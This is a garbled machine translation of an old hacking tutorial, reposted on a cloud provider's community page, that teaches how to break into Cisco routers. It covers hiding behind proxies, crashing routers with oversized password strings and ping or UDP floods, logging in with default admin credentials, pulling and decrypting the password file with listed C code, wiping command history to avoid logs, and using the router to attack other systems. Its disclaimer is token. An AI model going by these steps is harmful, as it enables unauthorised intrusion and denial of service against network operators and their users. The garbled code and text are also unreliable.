Attack a CISCO Router

Source: Internet
Author: User
Tags ping and traceroute

The original Article is from BlackSun. It is translated in sleep hours. This is a very good article and I am very happy to share it with you!


Do not use this to damage the cisco system or access the system illegally. This article is for the purpose of learning. It can only be used for legal actions and cannot damage any system. This article will show you step by step how to use the discovered defects to obtain illegal access. If you break into a cisco router or disrupt the system, hundreds of network clients will be interrupted, resulting in massive losses. Therefore, it can only be performed when it is allowed. Otherwise, you will have a lot of trouble!

Bytes ----------------------------------------------------------------------------------------------


Bytes ----------------------------------------------------------------------------------------------

What you need to know before reading:

-What is an IP address?

-What is ISP?

-What is a TCP/IP packet?

-How to hide your IP address?

-How to use Telnet?

-How to Use HyperTerminal?

-How to Use Ping?

-How to Use TraceRoute?

-How to Use the proxy server?

Bytes ----------------------------------------------------------------------------------------------

-Section 1: Why is a cisco router attacked?

-Section 2: How to find a cisco router?

-Section 3: how to break into a cisco router?

-Section 4: how to crack the password?

-Section 5: how to use a cisco router?

Bytes ----------------------------------------------------------------------------------------------

What you need to know before:

Bytes ----------------------------------------------------------------------------------------------

What is an IP address?

IP is short for Internet Protocol. A computer uses an IP address to identify and connect other computers in the network. This is why you are kicked out in IRC and find your ISP and your approximate position. IP addresses are easy to obtain. The following methods can be used:


-When you access a website, your IP address is recorded

-In IRC, someone gets your IP address.

-In ICQ and OICQ, you can simply get your IP address and use some gadgets.

-If your computer is connected to someone, run dig at to view the connection to those computers (displayed by IP address)

-Someone sent you an email written in a java program to get your IP address.

There are many other ways to get the IP address, including using some Trojans and Backdoor programs.


What is ISP?

ISP is the abbreviation of Internet Service Provider. You connect to the internet through them. After dialing, you will connect to it. We can run a traceroute (tracking path) to find our ISP (traceroute will be introduced later ).

You should see something like this:


Tracing route to []

Over a maximum of 30 hops.

1 147 ms 122 ms 132 ms your. isp [] <your ISP

[1] [2] [3] [4] [5] [6] Next page

Article entry: csh responsible editor: csh

2 122 ms 143 ms 123 ms isp. firewall [] <Preferences. You can change the buffer size here.

You can also enable/disable "local echo ". If you enable "local echo", your computer will display everything you entered, and the connected computer will display a response.

So you will see the following:

You enter "hello", what you see is


This is because the returned information is mixed with the content you entered. The only reason I do this is to check whether the connected machine responds to my input.

By default, telnet is connected only through the telnet port, that is, the failure is 23. You will not only connect through port 23, so you can change the port whenever you connect. You can change it to 25, which is the port of the mail service program. It can also be 21, which is the ftp port. There are thousands of ports in total, so you need to select the correct port!

Bytes -----------------------------------------------------------------------------------------------

How to use a Super Terminal?

A Super Terminal allows any port on your computer to listen to a computer. If there is information coming to this port, You can transmit the data. You can install the Super Terminal in the control panel if it is not in the Start> program> attachment> communication. First, select the connection protocol. Select "TCP/IP Winsock", enter the computer to connect to, and select the port below. You can select Call> Wait for Call to Wait for the file. In this way, other computers can connect to you through a port. You can also chat or transfer files.

: My Super Terminal may be different, but this function is not available.

Bytes ----------------------------------------------------------------------------------------------

How to Use Ping?

Ping is easy to use, in the MS-DOS mode, enter "ping IP Address", the default is ping three times, you can also set.

"Ping IP address-t" can enable non-stop ping.

You can change the ping size as follows: "ping-l (size) ip. address"

Ping actually sends packets to a remote machine. When the remote machine receives the packets, the original packet is returned. We can see the time of this process. The shorter the time, the faster the speed. Of course, packet loss occurs during congestion. Ping slows down the speed of the computer to be pinged, and even causes the computer to go down when the traffic is too high. A one-minute ping attack can crash a win98 computer. (Because of its connection Buffer Overflow-excessive connections, Windows decides to take a rest:>). ping attacks also occupy a lot of your bandwidth, so your bandwidth needs

Larger than the target machine (unless the target machine runs Windows 98 and you have a good cat, you can call it out in one minute ).

Ping attacks have no effect on strong systems.

Note: The DOS's-t option is not a ping attack. It is only a small connection, and there are many intervals between them. On Unix or Linux machines, you can use the-f parameter to perform real ping attacks. In fact, if your distribution is POSIX-compliant (POSIX-Portable Operating System Interface based on uniX), otherwise it is not a real Unix/Linux distribution. If you have an OS that is both Unix and Linux, there is-f.

Bytes -----------------------------------------------------------------------------------------------

How to Use TraceRoute?

To track your connection (you can observe the connection route of the target machine), just enter "tracert IP Address" in MS-DOS mode ". You will see a computer directory, that is, the machine that passes between you and the target ..

You can use this method to determine whether a firewall exists or whether someone's ISP (internet service provider) exists ).

To determine the ISP, you only need to check the previous IP address of the target machine, it should be the ISP's router.

Basically, this is how traceroute works-a TCP/IP packet with a value in its header (in the IP header. If you don't know what it means, it doesn't matter. You can just look down.) TTL is short for Time To Live. When a data packet passes through the router, its TTL value is reduced. This may cause data packets to flow in the network and consume bandwidth. Therefore, when the TTL value of a data packet reaches 0, it becomes invalid and is returned to the sender due to an ICMP error. Now traceroute first sends a packet whose TTL value is 1, and then it will return soon. To view the ICMP error header, traceroute can know which data packet passes through in the first step. Next, a data packet with a TTL value of 2 is sent. After the result is returned, it is the second place that passes the request. Continue until the final destination, you can know the entire path.

Previous Page [1] [2] [3] [4] [5] [6] Next page

Article entry: csh responsible editor: csh

Do you understand now?

Bytes ----------------------------------------------------------------------------------------------

How to use proxy server?

Search for a proxy server on the Internet, including the proxy server that opens the port you need. After finding it, you can use telnet or hyperterminal to connect to another computer through the proxy server. In this way, the recipient's computer cannot determine your IP address.

Bytes ----------------------------------------------------------------------------------------------

Section 1: Why are cisco routers attacked?

You may wonder why you want to attack a cisco router?

The answer is that it will be very useful to break into other systems...

Cisco routers are very fast. In a system, some are connected at 18 T1. They are also very flexible. Although most of them run telnet, they can play a role in DoS attacks or attacking other systems.

They also have thousands of data packets passing through. But many cisco routers can be captured for decoding, and many of them are entrusted to the system. They allow you to obtain the exact number of accesses to other computers in their networks.

Bytes -----------------------------------------------------------------------------------------------

Section 2: How to find a cisco router?

Finding a cisco router is a simple task. Almost all ISPs use at least one cisco router. The simplest method is to run tracert in dos. You can track many computers between computers. There must be a cisco name. If you find it, write down its IP address.

: There may not be a cisco name in China, but there must be a router. You can use SuperScan to scan the first two IP addresses to see which port 2001 is opened (Cisco router management) and port 23!

Now you have the location of the cisco router, but it may have a firewall to protect it, so you need to check whether it has been blocked for the number of ping connections. If there is a response, it may not be blocked. Another way is to try to access some of the cisco routers.

Port. You can use telnet to access port 23. If you want to enter a password without entering the user name, you may be in a firewall.

Try to find a router that is not protected by the firewall, because the topic of this tutorial is vro, not to teach you how to use the firewall. When you are sure to find a good system, you should find a proxy server that can use port 23, so that your IP address will not be recorded by the router

Recorded. : Find a machine that runs Wingate.

Bytes -----------------------------------------------------------------------------------------------

Section 3: how to break into a cisco router?

The Cisco router runs V4.1 software (currently widely used), which is easy to eliminate. You only need to connect to a cisco router through the proxy server and enter a long string of passwords, such:





Now wait, the cisco system will restart. You can say that you have attacked it and made it offline... but in 2-10 minutes, it will be restored and we should enter it.

If nothing happens, it is not a vulnerable software. You can try several DoS attacks, such as a large number of ping attacks. in dos, enter "ping-l 56550 cisco. router. ip-t ", this will play the same effect.

: It is very likely that none of the above methods will work. If you want to shut down the machine, try the udpFlood attack on yahoo to bring it down. Be careful! I believe you should know how to protect yourself.

Previous Page [1] [2] [3] [4] [5] [6] Next page

Article entry: csh responsible editor: csh

If it is passively closed, find another Proxy Server to connect. And the username is "admin", and the password is "admin", because this is the default.

Because when it is temporarily disabled, it will be restored to the default state.

: When you go to my homepage, there will be an article about the Default usernames and passwords of almost all vrouters.

Now that you have entered, you should obtain the password file! The system runs different software, but most of them have prompts like "htl-textil". Enter "? ", Watching life. You will see a lot of commands, you will find a transfer command, using this command, in the current Admin user, send the password file to your computer port 23. But before that, you need to set up your Super Terminal. After you send the file, the Super Terminal will ask you if you want to receive the file. You can select and save it on your computer. Offline. You have passed the most difficult part. Next we will start to crack the password.

Bytes -----------------------------------------------------------------------------------------------

Section 4: how to crack the password?

Now that you have obtained the password file, you need to crack it before you can continue to enter the vro. So you can run software like John the Ripper to crack it.

This is the simplest method I recommend. Another method is to try decoding it. This requires a decoding software and some decoding software. You need to be patient.

Here is a software dedicated to decoding the cisco Router password file. You can compile it in Linux:

# Include

# Include

Char xlat [] = {

0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,

0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,

0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44


Char pw_str1 [] = "password 7 ";

Char pw_str2 [] = "enable-password 7 ";

Char * pname;

Cdecrypt (enc_pw, dec_pw)

Char * enc_pw;

Char * dec_pw;


Unsigned int seed, I, val = 0;

If (strlen (enc_pw) & 1)

Return (-1 );

Seed = (enc_pw [0]-? ') * 10 + enc_pw [1]-? '

If (seed> 15 |! Isdigit (enc_pw [0]) |! Isdigit (enc_pw [1])

Return (-1 );

For (I = 2; I <= strlen (enc_pw); I ++ ){

If (I! = 2 &&! (I & 1 )){

Dec_pw [I/2-2] = val ^ xlat [seed ++];

Val = 0;


Val * = 16;

If (isdigit (enc_pw [I] = toupper (enc_pw [I]) {

Val + = enc_pw [I]-? '



If (enc_pw [I]> = 'A' & enc_pw [I] <= 'F '){

Val + = enc_pw [I]-'A' + 10;



If (strlen (enc_pw )! = I)

Previous Page [1] [2] [3] [4] [5] [6] Next page

Article entry: csh responsible editor: csh

Return (-1 );


Dec_pw [++ I/2] = 0;

Return (0 );


Usage ()


Fprintf (stdout, "Usage: % s-p \ n", pname );

Fprintf (stdout, "% s \ n", pname );

Return (0 );


Main (argc, argv)

Int argc;

Char ** argv;


FILE * in = stdin, * out = stdout;

Char line [257];

Char passwd [65];

Unsigned int I, pw_pos;

Pname = argv [0];

If (argc> 1)


If (argc> 3 ){

Usage ();

Exit (1 );


If (argv [1] [0] = '-')


Switch (argv [1] [1]) {

Case 'H ':

Usage ();


Case 'p ':

If (cdecrypt (argv [2], passwd )){

Fprintf (stderr, "Error. \ n ");

Exit (1 );


Fprintf (stdout, "password: % s \ n", passwd );



Fprintf (stderr, "% s: unknow option.", pname );


Return (0 );


If (in = fopen (argv [1], "rt") = NULL)

Exit (1 );

If (argc> 2)

If (out = fopen (argv [2], "wt") = NULL)

Exit (1 );


While (1 ){

For (I = 0; I <256; I ++ ){

If (line [I] = fgetc (in) = EOF ){

If (I)


Fclose (in );

Fclose (out );

Return (0 );

Previous Page [1] [2] [3] [4] [5] [6] Next page

Article entry: csh responsible editor: csh


If (line [I] = '\ R ')

I --;

If (line [I] = '\ n ')



Pw_pos = 0;

Line [I] = 0;

If (! Strncmp (line, pw_str1, strlen (pw_str1 )))

Pw_pos = strlen (pw_str1 );

If (! Strncmp (line, pw_str2, strlen (pw_str2 )))

Pw_pos = strlen (pw_str2 );

If (! Pw_pos ){

Fprintf (stdout, "% s \ n", line );



If (cdecrypt (& line [pw_pos], passwd )){

Fprintf (stderr, "Error. \ n ");

Exit (1 );


Else {

If (pw_pos = strlen (pw_str1 ))

Fprintf (out, "% s", pw_str1 );


Fprintf (out, "% s", pw_str2 );

Fprintf (out, "% s \ n", passwd );




If you are not using Linux, you have to use software such as John the Ripper, with a password file to crack the profits.

Bytes -----------------------------------------------------------------------------------------------

Section 5: how to use a cisco router?

To use it, you must first connect to it. You can use a proxy to avoid your IP address being recorded. When you enter, if you want to disable the history to cover up your behavior, you only need to enter "terminal history size 0 ". In this way, nothing will be recorded! Enter "? "Most of the commands in a vro can be used.

These routers generally have telnet, so you can connect to other systems (such as unix boxes) through telnet and attack them. You can also use ping and traceroute to track the system or perform DoS attacks. You can also listen to data packets, but I do not recommend this because it is not necessarily successful and will be discovered ....

Bytes ----------------------------------------------------------------------------------------------

If you haven't attacked cisco for the first time, don't worry... it's impossible for you to succeed once or twice. It requires continuous exercises and strong endurance.

Here we only want to do what you will do... it must be done under legal circumstances!

---- Excerpted from "League"

Previous Page [1] [2] [3] [4] [5] [6]

Article entry: csh responsible editor: csh

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.